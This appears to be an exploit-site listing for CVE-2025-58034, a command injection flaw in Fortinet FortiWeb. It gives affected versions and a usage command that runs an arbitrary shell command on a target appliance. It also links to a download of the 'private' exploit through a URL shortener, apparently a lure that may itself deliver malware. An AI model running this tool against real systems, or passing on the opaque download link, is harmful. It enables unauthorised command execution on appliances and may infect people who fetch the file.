Share
## https://sploitus.com/exploit?id=65B0CAAB-906F-53A9-AB1C-B728ADB31594
# OS Command Injection Vulnerability in Fortinet FortiWeb (CVE-2025-58034)

## Overview

CVE-2025-58034 is a vulnerability identified in Fortinet's FortiWeb, a web application firewall designed to protect applications from vulnerabilities and attacks such as SQL injection, cross-site scripting, and more.

## Details

- **CVE ID**: [CVE-2025-58034](https://nvd.nist.gov/vuln/detail/CVE-2025-58034)
- **Published**: 2025-11-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

This flaw is present in various versions of FortiWeb, allowing an authenticated attacker to potentially execute unauthorized commands on the underlying operating system

## Affected Versions

**FortiWeb:**

- FortiWeb 7.6.0 <= 7.6.4
- FortiWeb 7.4.0 <= 7.4.8
- FortiWeb 7.2.0 <= 7.2.11
- FortiWeb 7.0.2 <= 7.0.11


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Exploit:
### [Download here](https://tinyurl.com/yhauhpe4)